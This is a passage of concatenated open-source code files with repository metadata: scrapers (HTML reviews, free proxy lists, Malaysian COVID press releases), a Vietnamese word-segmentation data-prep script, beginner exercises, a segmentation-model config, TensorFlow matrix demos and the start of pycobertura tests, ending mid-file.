</div> </div>","") review3 = review3.replace("</div> </div>","") review3 = review3.replace("<div> <div>","") review3 = review3.replace("</div> </div> </div> </div>","") review3 = review3.replace("</p> <div class='row'> <div class='cell top '> <p class=\"strong tightVert\">Advice to Management</p> <p class=' adviceMgmt noMargVert truncateThis wrapToggleStr'>","") print review3 startindex = webContent.find ("<p class=' tightBot '>") cons = webContent.find ("</p <p class=' cons nomargVert truncateThis wrapToggleStr'>") for line in f: f.write(review3) #f.close() """mgmt = 0 startindex = 0 while startindex !=-1: mgmt = webContent.find ("</p> </div> </div> <div") startindex += len("<p class=' tightBot '>") mgmt += len("</p> </div> </div> <div class='row'> <div class='cell top '> <p class='strong tightVert'>") webContent = webContent[mgmt:] review4 = "" endindexmgmt = webContent.find("</p> <p class=' adviceMgmt noMargVert truncateThis wrapToggleStr'>") if endindexmgmt != -1: review4 = webContent[0:endindexmgmt] review4 = review4.replace("</p> </div> </div> <div class='row'>", "") review4 = review4.replace("</p> <p class=' adviceMgmt noMargVert truncateThis wrapToggleStr'>","") review4 = review4.replace("</div> </div> </div>","") review4 = review4.replace("</div> </div>","") review4 = review4.replace("<div> <div>","") review4 = review4.replace("</div> </div> </div> </div>","") review4 = review4.replace("</p> <div class='row'> <div class='cell top '> <p class=\"strong tightVert\">Advice to Management</p> <p class=' adviceMgmt noMargVert truncateThis wrapToggleStr'>","") print review4 startindex = webContent.find ("<p class=' tightBot '>") mgmt = webContent.find ("</p> </div> </div> <div class='row'> <div class='cell top '> <p class='strong tightVert'>") if letstrythis > 0: continue while letstrythis !=-1: continue"""
5d8eeb2647ece22b5b27583eec69d257f7248cb3
e8a3c31a3fb4159878a9848677055008e1a174a7
/preparedata4cnn.py
d295f3956823d7bc65d2bf9643ce02d49d8352f8
[]
no_license
giahy2507/ws
7dc1f9a75a550cc7fe67cc203837af09de62a50e
aee3316a0976e8cae8da9020d198f69e662e0b0f
refs/heads/master
2021-01-10T11:21:45.300750
2016-04-02T07:22:48
2016-04-02T07:22:48
53,932,985
0
0
null
null
null
null
UTF-8
Python
false
false
10,711
py
import os import numpy as np import pickle from sys import stdout import time import sys class Vocabulary(object): def __init__(self, word_index, word_freq, alphabet, min_count): self.word_index = word_index self.embed_matrix = None self.word_freq = word_freq self.vocab_size = len(word_index.keys()) self.alphabet = alphabet self.min_count = min_count def __str__(self): return "Vocabulary" def save(self, file): with open(file, mode="wb") as f: pickle.dump(self, f) def get_index(self, word): A = Vocabulary.str_intersection(word.lower(), self.alphabet) if len(A) == len(word): # push to dictionany, freq += 1 if word.lower() in self.word_index.keys(): index = self.word_index[word.lower()] else: index = 1 else: index = 0 return index @classmethod def load(cls, file): if os.path.isfile(file): with open(file, mode="rb") as f: vocab = pickle.load(f) return Vocabulary(vocab.word_index, vocab.word_freq, vocab.alphabet, vocab.min_count) else: print("No such file !") return None @classmethod def filter_with_min_count(cls, word_freq, min_count): idx = 4 word_index = {"symbol":0, "unk": 1, "head": 2, "tail":3} for word in word_freq.keys(): if word_freq[word] >= min_count: word_index[word] = idx idx+=1 return word_index @classmethod def load_alphabet(cls, filename): fi = open(filename, "r") alphabet = fi.readline() fi.close() return alphabet @classmethod def str_intersection(cls, s1, s2): out = "" for c in s1: if c in s2: out += c return out def rebuild_vocab_ws(self, train_filepath ,min_count = 5): # after rebuild wordindex will be changed print ("rebuild vocab") with open(train_filepath, mode="r") as fi: sentences = fi.readlines() for i, sentence in enumerate(sentences): if i % 100000 == 0: print("Rebuild vocab processed line : ", i) for word in sentence.replace("_"," ").lower().split(): A = Vocabulary.str_intersection(word,self.alphabet) if len(A) == len(word): # push to dictionany, freq += 1 if word not in self.word_freq.keys(): self.word_freq[word] = 1 else: self.word_freq[word] +=1 else: self.word_freq["symbol"] +=1 self.word_index = Vocabulary.filter_with_min_count(self.word_freq,min_count) @classmethod def build_vocab_ws(cls, train_filepath, alphatbet_filepath , min_count = 5): print ("Build vocab ... ") with open(train_filepath, mode="r") as fi: sentences = fi.readlines() word_freq = {"symbol":0} alphabet = Vocabulary.load_alphabet(alphatbet_filepath) for i, sentence in enumerate(sentences): if i % 100000 == 0: print("Build vocab processed line ", i) for word in sentence.replace("_"," ").lower().split(): A = Vocabulary.str_intersection(word,alphabet) if len(A) == len(word): # push to dictionany, freq += 1 if word not in word_freq.keys(): word_freq[word] = 1 else: word_freq[word] +=1 else: word_freq["symbol"] +=1 word_index = Vocabulary.filter_with_min_count(word_freq,min_count) return Vocabulary(word_index,word_freq,alphabet,min_count) def sen_2_index(self, sentence = "", tagset = "YN"): sentence_result = [] tag_result = [] syllables_result = [] words = sentence.split() for word in words: syllables = word.split('_') if len(syllables) == 0: print("exception: ", syllables) sys.exit(2) elif len(syllables) == 1: sentence_result.append(self.get_index(syllables[0])) syllables_result.append(syllables[0]) if tagset == "YN": tag_result.append(0) else: print("Invalid tagset") sys.exit(2) else: if tagset == "YN": for syllable_idx in range(len(syllables)): sentence_result.append(self.get_index(syllables[syllable_idx])) syllables_result.append(syllables[syllable_idx]) if syllable_idx == len(syllables) -1: tag_result.append(0) else: tag_result.append(1) return sentence_result, syllables_result , tag_result def gen_data_from_sentence_indexs(words_index, labels): """ Params: words_index: labels: :return: [[index_A,index_B,index_C,index_D,index E], ...] , [label_1, label2,] head: 2 tail: 3 [1 ,2 ,3] """ if len(words_index) == 0: return np.array([[]]), np.array([]) elif len(words_index) == 1: return np.array([[2,2,words_index[0],3,3]]),np.array(labels) elif len(words_index) == 2: return np.array([[2, 2, words_index[0], words_index[1], 3], [2, words_index[0], words_index[1], 3, 3] ]),np.array(labels) elif len(words_index) == 3: return np.array([[2, 2, words_index[0], words_index[1], 3], [2, words_index[0], words_index[1], words_index[2], 3], [words_index[0], words_index[1],words_index[2], 3, 3]]),np.array(labels) elif len(words_index) == 4: return np.array([[2, 2, words_index[0], words_index[1], 3], [2, words_index[0], words_index[1], words_index[2], words_index[3]], [words_index[0], words_index[1],words_index[2], words_index[3], 3], [words_index[1],words_index[2], words_index[3], 3, 3]]), np.array(labels) else: samples = [] samples.append([ 2, 2, words_index[0], words_index[0+1], words_index[0+2]]) samples.append([ 2, words_index[0], words_index[1], words_index[2], words_index[3]]) for i in range(2,len(words_index)-2,1): samples.append(words_index[i-2:i+2+1]) samples.append([ words_index[-4],words_index[-3], words_index[-2], words_index[-1], 3]) samples.append([ words_index[-3], words_index[-2], words_index[-1], 3, 3]) return np.array(samples), np.array(labels) def build_vocab(file_path, save_path = "model/vocab.bin", alphabet_path = "rule/alphabet.txt", min_count=3): vocabulary = Vocabulary.build_vocab_ws(file_path,alphabet_path, min_count=3) # vocabulary.rebuild_vocab_ws("data/vcl.pre.txt", min_count=3) vocabulary.save(save_path) print(len(vocabulary.word_index.keys())) print(vocabulary.__str__()) if __name__ == "__main__": start_total = time.time() with open("model/vocab.bin", mode="rb") as f: vocabulary = pickle.load(f) print("Finish read Vocab") with open("data/vtb.pre.txt", mode="r") as f: lines = f.readlines() print("Finish read vtb") # [index_A index_B index_C index_D index E] ---------- label_C X = np.empty((0,5),dtype=np.int32) Y = np.empty((0),dtype=np.int32) start = time.clock() for i, line in enumerate(lines): if i % 10000 == 0: end = time.clock() sys.stdout.write("Prepare data from line "+ str( i - 10000) + " to line " +str(i) +" : " + str( int(end - start) )+ "s\n") sys.stdout.flush() start = time.clock() A = line.replace("_"," ").split() sentence_indexs, syllables_result, tag_results = vocabulary.sen_2_index(line) if (len(sentence_indexs) != len(tag_results)): print("2 thang nay ko bang ne") else: xx, yy = gen_data_from_sentence_indexs(sentence_indexs,tag_results) X = np.concatenate((X,xx), axis=0) Y = np.concatenate((Y,yy)) print(X.shape) print(Y.shape) print("Finish process vtb") # fi = open("data/vcl.pre.txt", mode="r") # print("Processing vtb") # # start = time.clock() # for i, line in enumerate(fi): # if i % 10000 == 0: # end = time.clock() # sys.stdout.write("Prepare data from line "+ str( i - 10000) + " to line " +str(i) +" : " + str( int(end - start) )+ "s\n") # sys.stdout.flush() # start = time.clock() # if i % 100000 == 0: # valid_number = int(X.shape[0]*0.8) # X_train, Y_train, X_validation, Y_validation = X[:valid_number], Y[:valid_number], X[valid_number:], Y[valid_number:] # with open("data/vtb.pre.txt.train.nparray", mode="wb") as f: # pickle.dump((X_train, Y_train, X_validation, Y_validation),f) # print("Saved data to ", "data/vtb.pre.txt.train.nparray") # start = time.clock() # A = line.replace("_"," ").split() # sentence_indexs, tag_results = vocabulary.sen_2_index(line) # # if (len(sentence_indexs) != len(tag_results)): # print("2 thang nay ko bang ne") # else: # xx, yy = gen_data_from_sentence_indexs(sentence_indexs,tag_results) # X = np.concatenate((X,xx), axis=0) # Y = np.concatenate((Y,yy)) # fi.close() # print("Finish process vcl") first1_X = X[0] first2_X = X[176492] first3_X = X[176492 + 166828] last1_X = X[176492-1] last2_X = X[176492 + 166828 - 1] last3_X = X[-1] print("first1_X", first1_X) print("last1_X", last1_X) print("first2_X", first2_X) print("last2_X", last2_X) print("first3_X", first3_X) print("last3_X", last3_X) end_total = time.time() print("Total time: ", end_total - start_total) valid_number = int(X.shape[0]*0.8) X_train, Y_train, X_validation, Y_validation = X[:valid_number], Y[:valid_number], X[valid_number:], Y[valid_number:] with open("data/vtb.pre.txt.train.nparray", mode="wb") as f: pickle.dump((X_train, Y_train, X_validation, Y_validation),f) print("Saved data to ", "data/vtb.pre.txt.train.nparray")
a6e55ce9f4a94bf7fe3b40c358854577daabf543
82f1e4eb6c1579f8d780e2b904586f6006fd1c11
/spider/spiders/proxy_spider.py
5541e6b431bbfe2805ddc458190ad593a0c62740
[]
no_license
zhenjunMa/MusicSpider
d7756075deea1e1ed7e7606eccb033c3bfa9bb50
b55fa08805767d9d7af19b287a27ecc57fc00385
refs/heads/master
2021-08-19T12:30:43.605227
2017-11-26T08:36:05
2017-11-26T08:36:05
111,176,566
3
0
null
null
null
null
UTF-8
Python
false
false
3,762
py
# -*- coding: utf-8 -*- import scrapy import urllib2 import requests from bs4 import BeautifulSoup def parse_proxy(response): print response # 获取西刺代理的高匿http代理,并验证 class ProxySpider(scrapy.Spider): name = "proxy" proxies = [] start_urls = [ "http://www.xicidaili.com/nn/1" ] def start_requests(self): http_proxies = [] https_proxies = [] xici_urls = [ "http://www.xicidaili.com/nn/1", "http://www.xicidaili.com/nn/2", "http://www.xicidaili.com/nn/3" ] for url in xici_urls: user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" referer = 'http://www.zhihu.com/articles' headers = {"User-Agent": user_agent, 'Referer': referer} request = urllib2.Request(url, headers=headers) response = urllib2.urlopen(request) soup = BeautifulSoup(response.read(), "lxml") table = soup.find("table", attrs={"id": "ip_list"}) trs = table.find_all("tr") for i in range(1, len(trs)): tr = trs[i] tds = tr.find_all("td") ip = tds[1].text port = tds[2].text desc = tds[4].text mode = tds[5].text.strip() if desc.encode('utf-8') == "高匿": if mode == "HTTPS": proxy = "https://" + ip + ":" + port # noinspection PyBroadException try: response = requests.get("https://www.baidu.com/js/bdsug.js?v=1.0.3.0", timeout=2, allow_redirects=False, proxies={"https": proxy}) if response.status_code == 200 and response.content.index("function") > -1: https_proxies.append(proxy) except Exception, e: print e elif mode == "HTTP": proxy = "http://" + ip + ":" + port # noinspection PyBroadException try: response = requests.get("http://www.baidu.com/js/bdsug.js?v=1.0.3.0", timeout=2, allow_redirects=False, proxies={"http": proxy}) if response.status_code == 200 and response.content.index("function") > -1: http_proxies.append(proxy) except Exception, e: print e print https_proxies print http_proxies def parse(self, response): pass # for idx, tr in enumerate(response.xpath('//table[@id="ip_list"]/tr')): # if idx > 0: # ip = tr.xpath('td').xpath('text()')[0].extract() # port = tr.xpath('td').xpath('text()')[1].extract() # desc = tr.xpath('td').xpath('text()')[4].extract().encode('utf-8') # mode = tr.xpath('td').xpath('text()')[5].extract().encode('utf-8') # # if desc == "高匿" and mode == "HTTP": # proxy = "http://" + ip + ":" + port # # noinspection PyBroadException # try: # resp = requests.get("http://www.baidu.com/js/bdsug.js?v=1.0.3.0", timeout=1, allow_redirects=False, proxies={"http": proxy}) # if resp.status_code == 200 and resp.content.index("function") > -1: # print "success" # self.proxies.append(proxy) # except Exception: # pass # for s in self.proxies: # print s
60f6598ba438e4ebb1d8210d5ebf7a0a9557a2f5
f3baf8b850c896231b4c254a22567fd5d7a5035c
/Aula 15/Ex 1 .py
304e9d38f14bc2eb168f7ea770a7789ea0e364df
[ "MIT" ]
permissive
Katakhan/TrabalhosPython2
e1c23119ef582038ceea0004c872c00778fd326e
ab47af0ff3c00922857578e58a1a149d9e65e229
refs/heads/master
2020-09-21T02:15:04.505791
2020-03-19T13:23:41
2020-03-19T13:23:41
224,650,620
0
0
null
null
null
null
UTF-8
Python
false
false
1,081
py
marca = input('Informe a marca da cerveja') teor = float(input('informe o teor alcoolico da cerveja')) tipo = input('Informe o tipo da cervaja(Alcoolico(1) e não alcoolico (0))') cerva_dicionario = {'marca':marca, 'teor':teor, 'tipo':tipo} def salvar_cerva(cerva_dicionario): arquivo = open ('Banco de cerva.txt','a') arquivo.write(f"{cerva_dicionario['marca']};{cerva_dicionario['teor']};{cerva_dicionario['tipo']}\n") arquivo.close() def ler(): lista = [] arquivo = open ('Banco de cerva.txt', 'r') for linha in arquivo: linha = linha.strip() lista_linha = linha.split(';') cerva = {'marca':lista_linha[0] , 'teor':lista_linha[1], 'tipo':lista_linha[2]} lista.append(cerva) arquivo.close() return lista def salvar(cerva): arquivo = open ('Banco de cerva.txt', 'r') for cerva in arquivo: print('linha') arquivo.close() cerva = {'marca':marca , 'teor':teor, 'tipo':tipo} salvar_cerva(cerva_dicionario) lista = ler() for p in lista: print(f"{p['marca']} - {p['teor']} - {p['tipo']}")
daf14cf7c7b03f03f1f1b401e88dd73d582756f7
e5f1f90c62255b4b16907e8036575ca3bf2612bc
/char.py
22f08890fa6eee0ddad64a9aae14dee3a0611a35
[]
no_license
engineern2019/Python
7719e1defe40161f7a53f8307d6970c27fdc088e
23b171c8190c8711329cc4f0957c4bff1ab873d5
refs/heads/master
2020-05-26T22:00:44.559494
2019-05-31T09:38:21
2019-05-31T09:38:21
188,390,440
0
0
null
null
null
null
UTF-8
Python
false
false
148
py
word=0 msg=input("enter any message ") i=0 while i<len(msg): if msg[i]==" ": word=word+1 i=i+1 print("There are ",(word+1), "words")
c4a8948659302be35ffd7f343130d4c6c4209acb
a6bdf72944765b6f57ef84005194d4918b2eca20
/actions/create_matrix.py
0f306dfc5013ee405a37ecb94444881ac816115b
[]
no_license
PrimalCat-Real/MatrixCalcConsole
b53000b196f62d9e8b02f9ecf6b89e7a839de23c
ed1d5c42d99ae07220103ba2a8206e0d50d0a5ec
refs/heads/main
2023-08-02T12:37:17.157922
2021-09-27T18:48:17
2021-09-27T18:48:17
410,194,564
0
0
null
null
null
null
UTF-8
Python
false
false
1,731
py
from colorama import * import sys import numpy as np sys.path.append(".") from actions import input_checkers as check # Создание нулевой матрицы за параметрами от пользователя def create_zero_matrix(): corect = False while not corect: try: count_lines = int(input("How many lines in matrix: ")) count_columns = int(input("How many columns in matrix: ")) corect = True except ValueError: print(Fore.RED + "Value must be number, try again" + Style.RESET_ALL) starter_matrix = np.zeros((count_lines, count_columns)) return starter_matrix, count_lines, count_columns # Заменяет нулевую матрицу значениеми пользователя class FulledMatrix(): def __init__(self): self.starter_matrix, self.count_lines, self.count_columns= create_zero_matrix() def create_fulled_matrix(self): for i in range(0, self.count_lines): try: holder_matrix_line = input(f'Write {i+1}th line: ').split(",") except ValueError(): print("error") matrix_line_checker = check.CheckInput() matrix_line_checker.check_action("Determine", holder_matrix_line) for a in range(0, self.count_columns): try: self.starter_matrix[i][a] = holder_matrix_line[a] except: # TODO возможно дабавить сообщение надо pass else: pass print(self.starter_matrix) return self.starter_matrix
4f44abc4467e44e07199edfa36da5089b6d4126b
edf15fa536202317ab394de6a243f44a7152c6f4
/result_code.py
9bb7af8e365d6763a98a5513811c1401afba7c2f
[]
no_license
deepankchauhan/translator
94e11587fa3ef7d66de6cae17b64c0107397249d
efa51aa58f76c87ac461aadf460645c1cce1b499
refs/heads/master
2020-04-17T05:37:01.349300
2019-02-23T18:43:21
2019-02-23T18:43:21
166,288,544
1
0
null
null
null
null
UTF-8
Python
false
false
15
py
print ("hey!")
b64af1d72b18f34d381cce1cc10749c45cd8231f
3d4e4c25a87bc58613207d5751a1a56042890379
/test_async_scrape.py
2c8875a5a59aa62c45e778b3d54069930ab6479e
[]
no_license
ansonnn07/covid19-malaysia
7ef27491136ebed9f6bbe17e34187db2067e3e2d
1ab8fbae17582f4e757002d2831e34f00a61a77c
refs/heads/main
2023-06-16T08:00:09.544743
2021-06-28T14:17:23
2021-06-28T14:17:23
362,746,762
0
0
null
null
null
null
UTF-8
Python
false
false
3,785
py
import asyncio import os import time from datetime import datetime, timedelta import pandas as pd import requests from aiohttp import ClientSession from bs4 import BeautifulSoup # translate the months from English to Malay month_translation = {"January": "januari", "February": "februari", "March": "mac", "April": "april", "May": "mei", "June": "jun", "July": "julai", "August": "ogos", "September": "september", "October": "oktober", "November": "november", "December": "disember"} default_url = "https://kpkesihatan.com/{format1}/kenyataan-akhbar-kpk-{format2}-situasi-semasa-jangkitan-penyakit-coronavirus-2019-covid-19-di-malaysia/" new_format_date = datetime(2021, 1, 20) def create_datetime(day, month, year): data_date = '-'.join([str(day).zfill(2), str(month).zfill(2), str(year)]) data_datetime = datetime.strptime(data_date, '%d-%m-%Y') return data_datetime def create_date_dict(dt): """to be passed to the default_url to create the URL for the date""" month_full = month_translation[dt.strftime('%B')] date_dict = {'format1': dt.strftime( '%Y/%m/%d'), 'format2': f'{dt.day}-{month_full}-{dt.year}'} return date_dict def create_datetime_and_dict(day, month, year): data_datetime = create_datetime(day, month, year) date_dict = create_date_dict(data_datetime) return data_datetime, date_dict async def fetch(url, session, current_date=None): async with session.get(url) as response: assert response.status == 200, f"Error accessing page on {current_date}\n{url}" html_body = await response.read() soup = BeautifulSoup(html_body, "lxml") df = pd.read_html(html_body, match='JUMLAH KESELURUHAN', header=0)[-1] return {"soup": soup, "date": current_date, "df": df} async def fetch_with_sem(sem, url, session, current_date=None): async with sem: return await fetch(url, session, current_date) async def async_scrape(start_date=datetime(2021, 1, 21), end_date=None, verbose=0): assert isinstance(end_date, datetime) current_date = start_date total_days = (end_date - start_date).days + 1 print(f"[INFO] Total days: {total_days}") tasks = [] sem = asyncio.Semaphore(10) async with ClientSession() as session: for i in range(total_days): url = default_url.format(**create_date_dict(current_date)) if verbose: print(f"{current_date = }") print(f"{url = }") tasks.append( asyncio.create_task( fetch_with_sem(sem, url, session, current_date)) ) current_date += timedelta(days=1) start_time = time.perf_counter() pages_content = await asyncio.gather(*tasks) # [{"body": "...", "current_date": datetime(2020, 1, 21)}] total_time = time.perf_counter() - start_time print(f"{total_time = :.4f} seconds") return pages_content # need to add this to avoid RuntimeError in Windows asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy()) start_date = datetime(2021, 1, 21) end_date = datetime(2021, 4, 30) scrape_coroutine = async_scrape(start_date=start_date, end_date=end_date, verbose=0) # results = asyncio.run(scrape_coroutine) results = await scrape_coroutine print("\n[INFO] Results for last 5 days:") for result in results[-5:]: print(f"{result['date'] = }")
c87637ee942e77a3ef3bfe68a33bda7071da689d
2d191eb46ed804c9029801832ff4016aeaf8d31c
/configs/ocrnet/ocrnet_r50-d8_512x512_40k_voc12aug.py
f15f514031eca94e146f3bebecf2fca04bdcd130
[ "Apache-2.0" ]
permissive
openseg-group/mmsegmentation
df99ac2c3510b7f2dff92405aae25026d1023d98
23939f09d2b0bd30fc26eb7f8af974f1f5441210
refs/heads/master
2023-03-02T07:49:23.652558
2021-02-15T04:16:28
2021-02-15T04:16:28
278,537,243
2
2
null
2020-07-10T04:24:16
2020-07-10T04:24:15
null
UTF-8
Python
false
false
945
py
_base_ = [ '../_base_/models/ocrnet_r50-d8.py', '../_base_/datasets/pascal_voc12_aug.py', '../_base_/default_runtime.py', '../_base_/schedules/schedule_40k.py' ] norm_cfg = dict(type='SyncBN', requires_grad=True) model = dict(decode_head=[ dict( type='FCNHead', in_channels=1024, in_index=2, channels=256, num_convs=1, concat_input=False, dropout_ratio=0.1, num_classes=21, norm_cfg=norm_cfg, align_corners=False, loss_decode=dict( type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)), dict( type='OCRHead', in_channels=2048, in_index=3, channels=512, ocr_channels=256, dropout_ratio=0.1, num_classes=21, norm_cfg=norm_cfg, align_corners=False, loss_decode=dict( type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)) ])
1661c0c892781faebf53a6250a84d0ea3848ed67
a9eb7535df8f92e54ddd13ff1e2d33cc37ab2c9e
/tf.matmul.py
3a9abd388278608eeda96a70cd7aa200395efdf3
[]
no_license
KennCoder7/Kenn-TEST
075c552a1a1d56e0f6679bf5210194dcf65a2bf0
b8dddff74591bdd25c3842ec0ec96862f37a5f88
refs/heads/master
2020-04-07T01:49:48.448703
2018-12-08T05:50:20
2018-12-08T05:50:20
157,953,826
1
0
null
null
null
null
UTF-8
Python
false
false
4,563
py
import tensorflow as tf # a_2d = tf.constant([1]*6, shape=[2, 3]) # b_2d = tf.constant([2]*12, shape=[3, 4]) # c_2d = tf.matmul(a_2d, b_2d) # a_3d = tf.constant([1]*12, shape=[2, 2, 3]) # b_3d = tf.constant([2]*24, shape=[2, 3, 4]) # c_3d = tf.matmul(a_3d, b_3d) # a_4d = tf.constant([1]*24, shape=[2, 2, 2, 3]) # b_4d = tf.constant([2]*48, shape=[2, 2, 3, 4]) # c_4d = tf.matmul(a_4d, b_4d) # # with tf.Session() as sess: # tf.global_variables_initializer().run() # print("# {}*{}={} \n{}". # format(a_2d.eval().shape, b_2d.eval().shape, c_2d.eval().shape, c_2d.eval())) # print("# {}*{}={} \n{}". # format(a_3d.eval().shape, b_3d.eval().shape, c_3d.eval().shape, c_3d.eval())) # print("# {}*{}={} \n{}". # format(a_4d.eval().shape, b_4d.eval().shape, c_4d.eval().shape, c_4d.eval())) # a_2d = tf.constant([1]*6, shape=[2, 3]) # b_2d = tf.constant([2]*6, shape=[2, 3]) # c_2d = tf.multiply(a_2d, b_2d) # a_3d = tf.constant([1]*12, shape=[2, 2, 3]) # b_3d = tf.constant([2]*12, shape=[2, 2, 3]) # c_3d = tf.multiply(a_3d, b_3d) # a_4d = tf.constant([1]*24, shape=[2, 2, 2, 3]) # b_4d = tf.constant([2]*24, shape=[2, 2, 2, 3]) # c_4d = tf.multiply(a_4d, b_4d) # with tf.Session() as sess: # tf.global_variables_initializer().run() # print("# {}*{}={} \n{}". # format(a_2d.eval().shape, b_2d.eval().shape, c_2d.eval().shape, c_2d.eval())) # print("# {}*{}={} \n{}". # format(a_3d.eval().shape, b_3d.eval().shape, c_3d.eval().shape, c_3d.eval())) # print("# {}*{}={} \n{}". # format(a_4d.eval().shape, b_4d.eval().shape, c_4d.eval().shape, c_4d.eval())) a_2d = tf.constant([1]*6, shape=[2, 3]) k = tf.constant(2) l = tf.constant([2, 3, 4]) b_2d_1 = tf.multiply(k, a_2d) # tf.multiply(a_2d, k) is also ok b_2d_2 = tf.multiply(l, a_2d) # tf.multiply(a_2d, l) is also ok a_3d = tf.constant([1]*12, shape=[2, 2, 3]) b_3d_1 = tf.multiply(k, a_3d) # tf.multiply(a_3d, k) is also ok b_3d_2 = tf.multiply(l, a_3d) # tf.multiply(a_3d, l) is also ok a_4d = tf.constant([1]*24, shape=[2, 2, 2, 3]) b_4d_1 = tf.multiply(k, a_4d) # tf.multiply(a_4d, k) is also ok b_4d_2 = tf.multiply(l, a_4d) # tf.multiply(a_4d, l) is also ok # with tf.Session() as sess: tf.global_variables_initializer().run() print("# {}*{}={} \n{}". format(k.eval().shape, a_2d.eval().shape, b_2d_1.eval().shape, b_2d_1.eval())) print("# {}*{}={} \n{}". format(l.eval().shape, a_2d.eval().shape, b_2d_2.eval().shape, b_2d_2.eval())) print("# {}*{}={} \n{}". format(k.eval().shape, a_3d.eval().shape, b_3d_1.eval().shape, b_3d_1.eval())) print("# {}*{}={} \n{}". format(l.eval().shape, a_3d.eval().shape, b_3d_2.eval().shape, b_3d_2.eval())) print("# {}*{}={} \n{}". format(k.eval().shape, a_4d.eval().shape, b_4d_1.eval().shape, b_4d_1.eval())) print("# {}*{}={} \n{}". format(l.eval().shape, a_4d.eval().shape, b_4d_2.eval().shape, b_4d_2.eval())) # with tf.Session() as sess: # tf.global_variables_initializer().run() # print("# c_2d_1 shape:{} \n{}".format(c_2d_1.eval().shape, c_2d_1.eval())) # print("# c_2d_2 shape:{} \n{}".format(c_2d_2.eval().shape, c_2d_2.eval())) # print("# c_3d_1 shape:{} \n{}".format(c_3d_1.eval().shape, c_3d_1.eval())) # print("# c_3d_2 shape:{} \n{}".format(c_3d_2.eval().shape, c_3d_2.eval())) # print("# c_4d_1 shape:{} \n{}".format(c_4d_1.eval().shape, c_4d_1.eval())) # print("# c_4d_2 shape:{} \n{}".format(c_4d_2.eval().shape, c_4d_2.eval())) # a_2d = tf.constant([1]*6, shape=[2, 3]) # d_2d_1 = tf.reduce_sum(a_2d, axis=0) # d_2d_2 = tf.reduce_sum(a_2d, axis=1) # a_3d = tf.constant([1]*12, shape=[2, 2, 3]) # d_3d_1 = tf.reduce_sum(a_3d, axis=1) # d_3d_2 = tf.reduce_sum(a_3d, axis=2) # a_4d = tf.constant([1]*24, shape=[2, 2, 2, 3]) # d_4d_1 = tf.reduce_sum(a_4d, axis=2) # d_4d_2 = tf.reduce_sum(a_4d, axis=3) # # with tf.Session() as sess: # tf.global_variables_initializer().run() # print("# a_2d 行累加得到shape:{}\n{}".format(d_2d_1.eval().shape, d_2d_1.eval())) # print("# a_2d 列累加得到shape:{}\n{}".format(d_2d_2.eval().shape, d_2d_2.eval())) # print("# a_3d 行累加得到shape:{}\n{}".format(d_3d_1.eval().shape, d_3d_1.eval())) # print("# a_3d 列累加得到shape:{}\n{}".format(d_3d_2.eval().shape, d_3d_2.eval())) # print("# a_4d 行累加得到shape:{}\n{}".format(d_4d_1.eval().shape, d_4d_1.eval())) # print("# a_4d 列累加得到shape:{}\n{}".format(d_4d_2.eval().shape, d_4d_2.eval()))
e08e72c85ee8c4b4b56053b4e2a2624dd50a38d1
8cd091ae2a579675f32b5c022fb263b9ce2d6324
/base_sift.py
151857a510044ee5371924e373e33c90af5034d0
[]
no_license
yanglinGEM/yl-code
70e80aad8d8c92e28f3c7ae581f2061e646ecc9c
99cdcbc03796b1dd88296fad830863318b25f83f
refs/heads/master
2023-02-03T15:25:53.715770
2020-12-22T13:30:54
2020-12-22T13:30:54
318,364,978
0
0
null
null
null
null
UTF-8
Python
false
false
691
py
import cv2 import numpy as np img_orign = cv2.imread('3.jpg') img=cv2.imread('target.jpg') rows,cols = img.shape[:2] gray_orign= cv2.cvtColor(img_orign,cv2.COLOR_BGR2GRAY) gray= cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) # 这个库需要将opencv版本倒回 sift=cv2.xfeatures2d.SIFT_create() kp1, des1 = sift.detectAndCompute(gray_orign, None) kp2, des2 = sift.detectAndCompute(gray, None) bf = cv2.BFMatcher() matches = bf.knnMatch(des1, des2, k=2) good = [] for m, n in matches: if m.distance < 0.75* n.distance: good.append([m]) img3 = cv2.drawMatchesKnn(img_orign, kp1, img, kp2, good[:20], None, flags=2) cv2.imshow('img',img3) cv2.waitKey(0) cv2.destroyAllWindows()
f5aa640d645d04cb491d5d5ff4dc186e33ed4a44
0cbb0df8fb8761c91643058e9a09bb8303268224
/utilities/config_reader.py
29a6fa7252eafa6be3056b2599fd60ab0ba339d3
[]
no_license
nareshrasamalla/python
75b34f6c3f50606e9bc259a9317093cbb249a97d
6eaca20de9055dc45c6bb19d41381e7c5456b583
refs/heads/master
2020-07-02T08:31:24.249611
2019-08-12T09:22:20
2019-08-12T09:22:20
201,473,887
0
0
null
null
null
null
UTF-8
Python
false
false
491
py
# -*- coding: utf-8 -*- """ This file is intended to read the System config file and fetch values out of it based on the section queried. """ import configparser import os #Intialize the Config Parser. config = configparser.RawConfigParser() os.chdir("..\config") #Load the Config File. config.read('nmi.config') #get_config_by_section is intended to read #a section from the specified config file. def get_config_by_section(section_name): return dict(config.items(section_name))
3f026d9eabf7526bb158dcdbb53c98d0f8daaeb9
ec7cd0f098c4e354fd80c385e1b6600758aa2dda
/tests/test_cobertura_diff.py
6fe83721be67ade280ccdc94e8cfc2a065aceef9
[ "MIT" ]
permissive
rndrr/pycobertura
aba5c0d202b2318ecc950a22ce4a9714b3c15819
d090ff7c93c5bf07e07676cfa3c12ca376135be1
refs/heads/master
2021-05-30T22:37:41.023079
2015-09-28T17:47:58
2015-09-28T17:47:58
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,238
py
from .utils import make_cobertura def test_diff_class_source(): from pycobertura.cobertura import CoberturaDiff from pycobertura.cobertura import Line cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml') cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml') differ = CoberturaDiff(cobertura1, cobertura2) expected_sources = { 'dummy/__init__': [], 'dummy/dummy': [ Line(1, u'def foo():\n', None, None), Line(2, u' pass\n', None, None), Line(3, u'\n', None, None), Line(4, u'def bar():\n', None, None), Line(5, u" a = 'a'\n", True, 'cov-up'), Line(6, u" d = 'd'\n", True, 'line-edit') ], 'dummy/dummy2': [ Line(1, u'def baz():\n', None, None), Line(2, u" c = 'c'\n", True, 'line-edit'), Line(3, u'\n', None, 'line-edit'), Line(4, u'def bat():\n', True, 'line-edit'), Line(5, u' pass\n', False, 'cov-down') ], 'dummy/dummy3': [ Line(1, u'def foobar():\n', False, 'line-edit'), Line(2, u' pass # This is a very long comment that was purposefully written so 